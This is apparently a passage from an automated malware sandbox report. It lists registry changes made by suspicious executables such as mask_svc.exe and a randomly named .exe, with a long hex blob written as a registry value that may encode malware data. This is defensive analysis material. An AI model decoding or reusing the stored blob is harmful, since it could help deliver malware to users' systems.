Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-741 = "New Zealand Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-831 = "SA Eastern Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1501 = "Turkey Daylight Time"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	oYJ4oarMVlCEKSuYDbZ6GPPw.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-462 = "Afghanistan Standard Time"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	oYJ4oarMVlCEKSuYDbZ6GPPw.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	oYJ4oarMVlCEKSuYDbZ6GPPw.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time"	oYJ4oarMVlCEKSuYDbZ6GPPw.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)"	oYJ4oarMVlCEKSuYDbZ6GPPw.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time"	oYJ4oarMVlCEKSuYDbZ6GPPw.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)"	oYJ4oarMVlCEKSuYDbZ6GPPw.exe

Modifies registry class 64 IoCs

Processes:

MicrosoftEdge.exeRuntimeBroker.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exesvchost.exesvchost.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exepowershell.exeSetup.tmpMicrosoftEdgeCP.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "1560"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\nl.norton.com\ = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\norton.com\Total = "448"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{20EP1MI0-142C-L17D-YD26-2GCP283P3KMT}\1 = "5636"	svchost.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{69RG4ZP0-857P-S13A-ZW93-6DTG316B7ZWC}\650478DC7424C37C\1 = 01000000000000000000000000000000000000010100000000000000000000000000000064650136363535303034343737383844444343373734343232343443433333373743430000568937b9e80509faad94ffc48f88d247df004d17ca900303000004040000ff00ff00b8b8000000000000404000000000000000000000000000000000000000000000000000000000000000000000101101000e11a5b40eb4bdc4ec99b94d81ec753c011a5350021d0815130c4d43020f00011b5442074552071b4e49074e640b1c734d020b014b2300072e24000000000000ae4b815dd36e8e60806e8e60806e8e603446e391846a8e603446e193f51b8e603446e0928d638e60bb0bd36286698e60bb0bd5649b748e60bb0bd465917e8e60891f65f3856b8e60806e8f61e20c8e6017a7d968836c8e6017a7d061806f8e6012a22f9f816f8e6017a7d263806f8e60383b0a0b826e8e606a00000000000000000000000000000000000000000000005015450064e28107b8495ccd6000000000000000f0f022022b090c0e00acac0000c8c80000000000d4f5210000101000000000808101000000101000000202000505020200000000050502020000000000b0b10100040400000000000202606101001010000000000010100000000000000010100000000000101000000000000000000010100000a0e647015c5c0000fcba47013c3c000000909101e0e1010000707101bcb10d00000000000000000000a0a10124220600f0c43501383800000000000000000000000000000000000000000000000000003005340194940000000000000000000000c0c000888a02000000000000000000000000000000000000000000000000002e5a111d0c740000802bab000010100000acac0000040400000000000000000000000000202000604e5c1605151561008a058f0000c0c0000090900000b0b000000000000000000000000000404000406e4a051515610000f0ec1c0000505101000a0a0000404101000000000000000000000000404000c0ee5e140515156100bcb10d0000707101000e0e00004a4b01000000000000000000000000404000406e49010f0d177300b0b00000008081010002020000585901000000000000000000000000404000406e5c010111630000e0e101000090910100020200005a5b01000000000000000000000000404000406e5c1709030c63002422060000a0a10100080800005c5d0100000000000000000000000040400042420000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000fb8b648f0b92626000101000066e345b4687ae57bd8576119b8778946ac62b27e02b8f6434acb42c364e345b59182e5ba09450a19e5fa7b7a0d0d77b8e6554ccb42c54176f3a6e357a61c67105b44008dcfddf9e57bfd736398cffdd9e57bfd737a6ae579ca42697de579c34e6254be3f88cb42c343c27bd0574737b8a677e357a7b88cc27bd05d5f25b8b667e345b4687ae57bd8576b13b8778946ac62b2601cb8f6434acb42c364e345b5915cb9010000c3f0f3030f000000000000000000c3b8b649c35a98f3ba2626000101000066e345b4687ae57bd8576119b8778946ac61b17e02b8f5404acb41c064e345b591ebb8b531faafe57bc93e8a1f9a0000444bb8f5404acb41c06423c045cf8b4bce010049f0464141fcfc0808fc0c101f41cccdffd9e57bc14e7e06b8778946ac62b37c6827c27bc943524627c27bc14e6ee63e89cb41c0817adb2d801d930100444bb8b56423c045b5b34bcca6647bf10688fb7d01000fb8b564e345b45240f6f6e57bd82f88ef6901000fb8778946ac61cd8cd85a01000fb8f5404acb41c064e345b5a964b9010000c3a5e57bcb3c8a13960000444bb8f5404acb41c06423c045cf8baf2a010049f0464141fcfc0808fc42cccdffd9e57bc14e7e06b8778946ac62b37c6827c27bc943524627c27bc14e6ee63e89cb41c0817adb2d807ef10000444bb8b56423c045b5b34bcca6647bf106885cdb00000fb8b564e345b451b5f6e57bd82f884fc800000fb8778946ac61cd8c38bb00000fb8f5404acb41c064e345b5a964bb030000c3a5e57b9a6d8a1b9e00000fb8f54064e57b9b6c8a159000000fb8f5464ccb41c460e57bc93e8afb7e0000444bb8b56423c045b40035f8444341fc42cccddff9e57be16e7e06b877814eac62b36350cccd90b6e57bf17e6b7a27c27bc94561ea3e89cb41c0817acb4d407b4bb8b56423c045b5b2447adb5c4e3fb8b564e345b4564469105b440066e57bd8576b13b8778946ac61b1601cb8f5404acb41c064e345b5915cba020000c3f0f3030f00000000000000000000c3b8b649c35a98f0b92626000101000066e345b4687ae57bd8576119b8778946ac62b27e02b8f5404acb41c064e345b59182e5b96e1cc5c748770d77b8a65476f3a6e357a61924f3454141fcfc0808fc8ecffdd9e57bc14e7e06b8778946ac61b07e6ae579cb43697de579c34e6254be3f88cb42c343c27bd95e4737b8a677e357a7b88cc27bd9545f25b8b667e345b4687ae57bd8576b13b8778946ac62b2601cb8f6434acb42c364e345b5915cb9010000c3f0f3030f000000000000000000c3b8b649c35a98f0b92626000101000066e345b4687ae57bd8576119b8778946ac62b27e02b8f5404acb41c064e345b59182e5b9483ac5c748770e74b8a65476f3a6e357a60439f3454141fcfc0808fc8ecffdd9e57bc14e7e06b8778946ac61b07e6ae579cb43697de579c34e6254be3f88cb42c343c27bda5d4434b8a677e357a7b88ccccda86b7bf27d5d25b8b667e345b4687ae57bd8576b13b8778946ac62b2601cb8f6434acb42c364e345b5915cb9010000c3f0f3030f000000000000c3b8b649c35a98f0b92626000101000066e345b4687ae57bd8576119b8778946ac62b27e02b8f5404acb41c064e345b59182e5b97e0cc5c748770e74b8a65476f3a6e357a60439f3454141fcfc0808fc8ecffdd9e57bc14e7e06b8778946ac61b07e6ae579cb43697de579c34e6254be3f88cb42c343c27bda5d4434b8a677e357a7b88ccccda86b7bf27d5d25b8b667e345b4687ae57bd8576b13b8778946ac62b2601cb8f6434acb42c364e345b5915cb9010000c3f0f3030f0000000000008c15031ec96df419010048c38eba853b01487bf78cc10da02401010041be3780c362a8c27bfe098807800000492aa38cc1889f701500beca070cec741800494acb371ea9c5b8133b1c01ebdf7cc5b858701c01ebc063c5b8f1d91c01ebc96ac5b83e151f01ebf251c5b8577c1f01ebfb58c5b89cb71f01ebec4fc5b8c5ee1f014cc7599ac34d8a67fdd9109f80000000444bb8bf4e49b8b314556ee3bd7c41cb43c247c045b59cacc04cbc576ac34632ea2e91aa0083bec9b64301324f7bf9fa1d4e5701b8b9010000e9a84302000fb8b54ac135986441010033cc38c2ce8943010101000089b4cca4540166e345b45864f1b9262600010100006669105b440066e57bd8576119b8778847ac62b27e02b8f5404acb41c064e345b591a0cf4483c74c8ef3bb212000010100000f105f400fb8bd6ce57ad957655b46ac69b97f6ae57af07c6d51ca7b9b1e6f5acb41c06424cbc5087471be3e88b63f2b389a2aa2894bc38875f5c800000f8c44c60100665f04a7ce550148c115b81c3901004cc53d906c4901004cc1b8660654014cc53598341101004cc1b04920550166eff578343f8b1d990000665f040f6754010f8b088c00004cc1c9601479c24c8a66ec579fb8a7524db8bb0c2bfaa47d40cb43c2874cbc996957a61c2071041c755501742be6b9080800e88d6207008b86eab3550148c5985d531a0189c568046dc64586c34385c64c8fc35327ea2799ab004cc78eeeb8520148c3586ab801000041beaf1008c34023a35e150089b494fd550166efb4e789520166efb49ef755010f101f0fb8f3780c5624cb8d3b77c5f27d64e345b598a1c737983411010048c3458267ddf9b8b66727c88d0a46c5c44b64e345b59aa7c34632ea60dda800ffeab20daa004cc73f906c49010048cb4b37f0101f66e5ff3a440248c5cd41748179894147020000b9bb020000482b9bb0c35c28ea318ca80048c35390cd45b4023ec34337ea368ba80048cd45b41c24c74c8fc35d9ec3432030439b0048c34034ea1aa7a80048c3586ab40d0000ffea5ce3aa0048cd45b441cafadb8d5201b8b901000048c317b81c39010048c337986441010048c307a824010100487bff249972030048c945dc1901005e039e8bc34034eabb09a70033f32b222169850400ccbf6615007c691500859015008e9b150097821500a0b51500a9bc1500cc0000000000000084cb6fc41bfa36eab905a9008545cf8bc6430100b9b40d000048c1d57804dfead16da9008545cf8b94110100b9b40d0000ffea8c30a90048c35390cd45cf8b8c09010048c34337ea299ba7004cc75390cd45cf8b77f3000048c34320f8e708007a45b45762f9bc04000049c2589bc34023c3d7030000ea50eca90048c3d7780413f388cb47eceb8ac24023392806007a45b45762f9bd05000049c2589bc340231407040000ea03bfa90048c3d7780413f388cb47eceb8ac240238a9805007a45b45762f9be06000049c2589bc340232536040000eaf24fa80048c3d7780413f388cb47eceb8ac240231b0905007a45b45762f9bf07000049c2589bc340237665040000eaad10a80048c3d7780413f388cb47eceb8ac24023fce30800bbcf4b89c2589bc340239e8d040000ea8538a80048c3d7780413f388cb47eceb40be30323e01324f7bf9fa34635301ffea7ac7a80048c3d7780413f388cb47eceb0f00008c171fcb6fdc03cc38c2336750010101000033e15bb43f50530141f970c8000089b4cfa3500148c5802e725001c7c21044500101010000c7c2aa913f01f4f50100e8926f150033e19ac580dc80500141f970c80000e88e73150048c1d57864d078d3c501007ebc90fc5001e8eb03000f811c920000487104f99451017402105f04f69b510174190b5f04afc350017410ddb9080800e81ef503008b86752950014cc1807428500189c568046cc1889bce510148c34380c598d1d3160148c35327eaae1ca7004cc78e7124510148c3586ab801000041beaf1008c340233cc5110089b40f63500166efb45e33510166efb4117d5001b94df5010089b4204c50018984e6d63c01ebed8d86eede3c01ffeae859a4003904127f51010f8ac4be0000b7c3d7786473f349b41d70510148cb47f46f9c0f0000000000000000000000000084c184f4b64e0133f3030f000000000084cb6fc4abbeccbe4e0101c6c2e6ac4e010000000075687b69109b8400000000b94df50100ffea8031a40083bef7854e0101759855dd640000ffea9425a40033f388cb47eceb0f00000000000000000074b90100003beba57e438fc289c34e0100000000c30f00000000000000000000000000000000aa0069109b8400000000487336340d3501f287675a8900d17691363e000d8777f0318b8908d9f9de370000cc00008c131bcb6fcc68c352eafa36ea66d7a40048c34034ea77c6a400ffea79c8a40048c34372b30d04c088cb47e47b13b7da45c4a40048c1c5682c40cb6fd481ae170000e83b4695008545b473bebb020000cde461c580fece3c01e822cb010048c3cf601c70c18cdfe43f0148c5c9601c70cb43c840c18c6f543f0148c38ec6fd3f0148c18c31093c0148c3cf606408c18c3d063f01c7c20b333c01090d04c007c20d353c0101010000c7c2172f3c0101010000b8b00800004823abc048c58007373c01488fc30503020000b8b00800004823abc048c3864f71320148c1c5482498b00800004823abc149c3863806320148c1c5482468c5803c97a600e8e8ff0000b7cb47fcfb0f000084cb6fc491b1080000e8ee06000048cb47eceb0f45c5682c40cb6fc491ae170000e8047894008545b47c83cf6014bb4305e461c58006363c01e89a72000048c3cf600c60c18cf7cf3c0148c5c9600c60cb43c840c18c87bf3c0148c38edee63c0148c18c49703d01c7c2370e3d01090d04c007c229103d0101010000c7c2330a3d0101010000b8b00800004823abc048c58023123d018bdf701478c19d1549c58072daa500e8a6b00100b7cb47eceb0f84c1d57804771fcb6fac08c35226ea8c3ba20048c33043f8000048c5d9707418c3448a76f33fea9c2ba20048cd45b4467acbe7401c3848c5c1687c10c3df70741cc74380c1c568147cc74c8fc5c1684428c1c5680c1bfa81c1d57804dfea4ff8a20048c3d7784c20cb47841f9c0f00008c1305011fcb6fac08c35226ea3e89a20048c3384bf8000033ccba76f388c5d9704428c34531ea0cbba20048cd45b44d71cbe7401c3848c5c1684c20c3df70442cc74380c1c568147cc74d8ec5c1685438c1c5680c1bfa81c1d57804dfeaff4ba100ff38447cfd7ecdf9cb47841f0105980f0000257e940300cc000084cb6fc4ad57a64dba69eb755cab69eb75629579fb757eb2b901000048cb47eceb2bb25e0400ebeeedc32f04000fb97688cb47eceb8ac25b98cb47ecc1e60f00004dc845cf9a5489cb47ecc1c52d010048c1d5782c40c1fd503458c1f5580461171ecb6fcc68c379bec77ac2fa2126ca04008444b57234f32901e80000e8a64d03008a5250cc606400f7b682bed3d13e0100747eb3be070000e8fa1a0800c7c2dde73e0101010000e87b9003008444b4138faa4b090048c5808a8e0900e83ad40600e87996070048c580979d0700e829c70600e844ab070048c59874c2a30048c5803799a300e851a31a008545b55cc1f01b03008444b45468c5980cbaa30048c58007a9a300e8c93b1a00c7c26e543e01020200004072cd7541233dd0050040c47bf08acbb10000179b74070048c35390cbbb3874506cc34320f21f05008444b46c50c39053c34023ab4a09004cc74d7cb802000049c245312c2cfa1d273e01b8b901000048c3d7781478c3ff501c70c3f7586c00cb47e4611f9d0f84c1d5782c40c1fd503c4f1fcb6fcc60ca7b7a8ee1da3f0133e85e45bf7b37f32bbbaf37418cd7ec3f01e8cd27020040ca7270cc601cbbbefaf93f0102767eb3be070000e803ed0600e8da3103008994ad8e3f01e8bf54030040ca4527ff12050033e192ca4426d93405008444cf9a5648488bc3d7781478c3ff506408cb47e47f9c0f0084c34f8cc1d1786cc5c95891d94058c1c1405e0116171ecb6fac09c27b7b71b6c77a7457a77a362c59723f017f7834f3295bb200008dcfbd7c7bf9765dc25eb600008b5351cd6014b545cf8b098d00004cc74d4d5c9ec245264b5e0200745351cd6014b545b4023ac74d4d5c9ec245267c6e0500745351cd6014b37cfe745eae45b5526bc74df5e19bc2452690820500b3c74df5e19bc245268b9e0200b3c74df5e19bc24526a64e0000857a8b71867cfc765f66c74d4d5c9ec24526a8bd0200745351cd6014b545b4675fc74d4d5c9ec24526c92100008b5351cd6014dbed35e852d57814bb488bc3d7785c30cb4784011f01019d0f000084c1d5782c40c1e5483458c1fd503c4f1fcb6fcc68c3969824a10049c2737379bac362a1cd5eae7088ce42eaf95ac340238b6407004cc74c4c5d9ec346322c9bc3d7781478c3e7481c70c3ff506408cb47e47f9c8bc1d5782c40c1fd5034471fcb6fcc69c273735192c37a7279fb7470edd73b04004cc74c4c589bc34586c3d7781478c3ff501c70cb47e47fb69e89010033000025b6471800cc00008c131bcb6fcc68c35232ca69c34023b14118008545b5675acb78048a72efba5a0800ebeeedc323080048c3402347b7180048cd45b4a19dcb47e47b988bcb6fc4c0db390a008545b455442dc38f211530000048c3c340e3ee4d73f3bc6027f330b847bebc81b03d01759bdcf288cb47eceb73b1ea1c3b000084cb6fc4c01ffe09008545b473eff6160800ebf2f137d609008b4320986e1e008545b47036f22becef1fd62100b0b149cb47eceb8bcb6fc41bfa21a94001008444cf9a5588cb47eceb0f000084cb6fc4c0cf2b0c008444b57136f22bf9fa4a8527008444b572efcd290c00eb075cb149cb47eceb8bcb6fc4c073bc2700e8e6020c00b0b149cb47eceb0f000084c1d5782c40c1e5483458c1fd503c4f1fcb6fcc69c272b0c27b7b5192c36201b85909008545b5629478fa74675ac344272bc605004cc74df5e19ac34632289fc3df707cd3c7687418c3d7781478c3e7481c70c3ff506408cb47e47fb66a941700cc000084cb6fc4c0ef0e09008545b46458c5808dbb3a0148cb47ecc10ec32400e8be4d1b008545b570edd92a1b0048cb47eceb8bcb6fc41bfa21f936270048cb47ecc1799b0b0040131bcb6fcc2fb9b376483a01854c72ba0100000f4b874b8d66583a01e832dc0600e805e70a008444b57136f22bfffc60ae26008444b57c3afa21d93a0b00eb0160498bcb47e47b980f000084c1d5782c5d1dc367a4cb6faccb525a7af80e8821a60000e88b6b08008545b45fae5eae526fc580d5e23b01e8975b24008545b47036f22b9132c580d1e63b01e8834f24008545cf9b542b8c2fc39e8cb22a0149ca4b3774497bf94000008363df14e378b1489a1b847ff18ec5cca5acc5ccade71f55a5acc5ccb502fd1f5dbdff1e1478473b014cc5cca5acc5ccade71f55a5acc5ccb502fd1e1c784f3b01f2fd1f5dbdff1e14744b3b01f2fd1e1c74433b0148c3d7787418cb47841d9e7abc050000e8b45e0200cc00000084cb6ff454c74a79f5175a00665f3c08d624008a0c312b66459b2400b7c598e8272500b7c5811c91b869154500752ae7b3090200665f78596d211867e9cdb8f6555cc5dc49504bd3dfb8f6474ec5818cccc181c682c19d306d72eaa56c93c1464077fab37881c94a0bc28d77fbb27a40cb41eac334ece19acd57a77136f22bff97f95e247d7936f22be1bab1eaed34f22be930f288cb47dcdb0f00008c131bcb6fccaa5331e30c070033e15745b47f8f5fae724fcf92634f380148cb47e47b9883131bcb6fcca0bda6a23801008a53ad708056a77b844123e82525008a41239d7c0900b0b149cb47e47b980f8c131bcb6fcc68c39e320d2b0148c3525241827b26260a38018362de779b1982cb79058a7f42c34023975d2200ebe447c3589bc5801e2a3801e812d8220033fa4c4588474b8f83c34a89cb47e47b980f84cb6fc4c04f580000b7bf2fc3db372f273780cb47eceb0f84c1d57804751dc367a4cb6fcc68cbe67d1848f389907df2b4b22b0048c38eac8028014873f8b61a27c5c055e7ea2fa09a0048c3ce5d50c1cc55efea31be9a008b4b88797455efea058a9a008b4b88c5c06d68797455efeaed6199008bce6568c5c05d588921c0687b7665687b7655587bf289f1460000000000ff00486be289f18a917df2b4b22b004873f88b474b8589c18c301c280148c3d7786c00bf2798c18c2b07280148cb47e47d9e8bc5806451390148b7da9f239900cc0084c58054613901e98564080048c58858653901c38bc58858653901c38bcb6fc4c00f180000b7cb8b0cec0e190000b7cb8b0a4acb47eceb0f84c588b4f44401c340a61c01390100c38bc1d5782c5d1dc5218864bb0400b7c96d2cc505008b5260ae170000e84d2f8a008545b4708f4006e4aaa62d3039010048c5c0bdc3e193f968d40400e8df3f080048c5c0bd0fead05d980048c31675e8000048c5184ddc040048c3408e76f33feaa62b980048cd45b44874cbe7401c3848c5006de4040048c31e4ddc04004cc74380c1c568147cc7488bc50065ec040048c1c5680c60c5c0bdb8c1c5680413fa36ea6fe2980048c30e4dcc040048c5c1687418c10c6de8000033e19ac5084dcc040041f92098000048cb43c840c10c0d880000e848a7070048c30e4dcc040048c1cd6044a7836074451500408783607055010000ffea6be69800837bf949c5c9607418c1cd606408c5c8b5ff9b578bc1cd606c7bfa36ea008d980048c5c16864bfea179a98008545b57ffc2dc0dbe1240133360148c317b8f4d5050048c94504c505005d9e0f000084c1d5782c40c1fd5034471fcb6fcc68c5901718130148c5b836111301ebfd5ec3b073cd7a8b7e42c3442781690000ff289fcb40cb4073e5ac97adc3d7781478c3ff501c70cb47e47f9c0f0084c1d5782c40c1fd5034471fcb6fcc68c590d3df100148c5b8f2d61001ebfd5ec3b073cd7a8b7e42c34427f51d0000ff289fcb40cb4073e5ac97adc3d7781478c3ff501c70cb47e47f9c0f0084b7da4cf09900cc8c131bcb6fcc68c35291c3498ac580f064990048c18243c5de5b3bfa81c18342c1c34240c5c540e0ec0c080048c58808979a0048c18a4bc3488bcb47e47b980ffff388c1c85158c58806999a0048c1c84940c588ed71990048c18849c34a020f8c131bcb6fcc68c35291c3498ac5809004990048c18243c5de5b3bfa81c18342c1c34240c5c540e04ca3070048c588d04c990048c18a4bc3488bcb47e47b980ffff388c1c85158c588ce52990048c1c84940c588b529990048c18849c34a020f8c131bcb6fcc68c35291c3498ac58030a4990048c18243c5de5b3bfa81c18342c1c34240c5c540e0ac43070048c3488bcb47e47b980f000084c5881488990048c18849cb42c9e15cb20700cc84c1d5782c5f1fcb6fcc68c588f66b980048c372b1c1888a5192cb42c9e07a950700f635c27579b7a218000048c34427ac46020048c34c8fc3d7781478cb47e47f9c0f0084cb6fa400c5c16804c80a1c0100b7c59836381a0148c5c16804c8917e0700cc84cb6fa400c5c16804c8cadd0000b7c5989e901a0148c5c16804c8b15e0700cc84cbfa710848c588811c980048474a0449cb0f0084c1d5783458c1f5583c4d1dc367a4cb6fcca3e68de833fafaf307c231112401020200000fade6cf4a06c22404240101010000817092220c0900cf418ecf5993c070940b1a1d28c0739b070b2c08c0719e1a1109294edb94cf509fcf8e4a7b350141c072b234011c2d4ed25258974fd25873b5220b1b46fa4273bc4fd96ab90100000fad2bccb5b4cf428dcdc4b5734341d4a97ddca9b9c057a7271acb8eb49d2501ffbec24bcc21d5cfc0f04bcd8cf8ce32013dfdc60701745c155d66040274551c4d760402746e1fb54905037c7bd8576c53f3ba010101010100004847ac60b0784ac24bc945cd8cc6f0320145c05eae6c9860e10fffff8e78f90f6f6072794ac24bcc40cd8ca0963201b8bf07000089dcb5a4cdc4a9dfc3845817fac6ad2bccb579d4a97dc4b571dca975d4b5e7b559ea7a784ac24bca46cd8c74423201414eb55bf5671da9c20120250102020000c7c2fbdd220106060000414eb55bfa6820124eb55bfd6f3f7ffac60ed1988923c26843db98c1dc4558c3ce5534223a3a7347b98ed5f32201834bc0cfc2ba9c220103030000f6b3adc8a98cbc9a22017467904be8e7c2a385220105050000898ca187220148c3d7781c0bf388c3f7586408cb47e47d9e0f0074b9010000c30f00fff3f93c397c41010f9a550301c200cc25829e0a003300008c131bcb6fcc68c588fa69960048c35291c188f734c3757eb0a2180000e83e290000b7c3488bcb47e47b980f000000000000000084c1d5782c40c1e5483458c1fd503c4f16151514141717161fcb6fac0dc6ea6940c362a4c6b270c24381c2d2617566d7b1c67ab8c273b4c761026a7d000009b34162698a65e0000041cafd3e00c1e5481478c1f5581c03083c8cf97b01008b75b64bfc74cfbfff4877c3f78d28aa00008bcfbff34477c3f78c1e9d000083ff87eb100f8b1692000083ff87f70d75639ccfbff744c5c16814794ac78dc25e2a2f5545b805030af5fc7d63101e8d955d60cbbe6c6e3e0100746a56c58045773e01e8533f84008545b47ab4bb01000048c34632ea240e3e018bc7b7eb51f9b9010000494acf85c25e3dbc51050049c2cd060cc74e4edfafeb59c24689cfc64d494ad79cc1cd600c61c2cd6e60c1cd6004dfeac6419200e8be530500ff392fdcca0000ccf3295cb5000049c2fd5661caf5360162df1d7f9600008b44874bca42cf8fcf4877c3f78d008200008bcf8fc34477c38b0a3dcfde5145c261c254300176fa4c57a64c7dce4a8c4ec382c9cf87c74c73cb825262c9cf87cb4073cb83659dcf8fdb527b7d87d3657e80cf8fc74e7b7d87cf787c49be3e857ff1b8ba8c7ff1bf42bccf8fdb9545b4784473cb856b5bc057a750cefc9aca4648c25e94c8cf0e0ccfcf8fc7bdb04c4ec785be2f2f384c9828c1f58de29f000047b90100004cc1d1786409c2d06b79c2e05371c2f83309c268a21e1e1f1f1c1c1d039c0f84cb6fc4c043a10a00e8f2100a00e819f405008444b57136f22bf9fa688505008444b572efcb250600eb075cb149cb47eceb0f0084cb6fc4c043af040048cd45cf9a5588cb47eceb8bcb6fc41bfa21ad410400b0b149cb47eceb0f0084cb6fc4ac4dbc64f99f720500e836db050033fa2117f60900b0b149cb47eceb8bcb6fc4c0b35e0500b0b149cb47eceb83131bcb6fccdfea49cd910048cd45b4675bc39350c343206c9f1b0048c3488bcd5eae98a5cb47e47b980f00000000000000000000000000000000000000aa0069109b84000000004cc752d6b9649bf0b8000000000000004d43a06583ca7be81f8984030100662f4661afa7696fa089c879788000000f89fa7c00000fb59fada72e01017251a9498ac35c9fc372b0c2433b59e2c371b3c24800a5000000000069109b84000000000f1e104d4fc289cb42d158cb6211bc67ea8cc643818828ee73425069105b44000f26280e26685158c940418000000f2668e1af2668f1f9b636c6266881cf266891df2668a186692668b185a19dca639f32c643818828ed70671c109f800000000f1e1049cb42d159b636bc81bdca63ef7b72474e1e554cf8b9c248003dce3000fbcb300027163100f7c73000043531001425310024153100f4c430002c1d3100083931004071310030013100003131001021310020113100f0c030004879310049c25a9dc1802be93000bcc80f050dbc30004c4fcb814acb81c24882be1e87f6d8c1d8a078d8a89fefd8ac75d9ae3c53d8c1d8a57dd8ad3f8bc1d8a67fd9ae3c8bc1d8a27ad8aa73d9ae3ccc105b440048c1d8a37bd8ab9cefd8af3d8bc199d38bc19976efd95880d85ac9cc105b440048c19976efd958cb8bc19958c1d958cb8bc1d5782c40c1fd503458c1f5583c59171ecb6fcca0f971084cc779bac37a853804c38a49cd45b4300ccb4c30b7b73847bc04387582bfc5c24ee98564090048c35390cd45b46850c78d4ec5da5649c34320ea181a0048c3488287804e0948c08f35e893c3402355b50800ebe142c38a49c18bc4844a0848c3d7781478c3ff501c70c3f7586408cb47e4611f9d0f00008c131bcb6fcca0f9710848c352ad7c40c382e169890800c6854b0848cba02348cb47e47b980f000084c1d5783458c1fd503c4d0216171ec367a4cb6f8c6f272d990d910048c379fd2725af3391004cc77afe266c85cf272da13591000f26649ddf2725a43891000f266ca5ef2664bdb8cd57a656d4f412646955c3b271c3ccbfb0c3d31808c3fb4078c34023405e0900b7c5c2b7072c9bc5d8756cc5fc9da0c34586c1fc850fea58c38e0048c1cc6568c35b98c1ccbdb0cd73826fedf00eb1b940d99875718cc4ad0be787cea5a8cd57dd4b8548cca5a4cfce9d94c1c0ad6bde914fc68d3fea03988e004cc1d1784429c2d07361c2f84379c268a21f010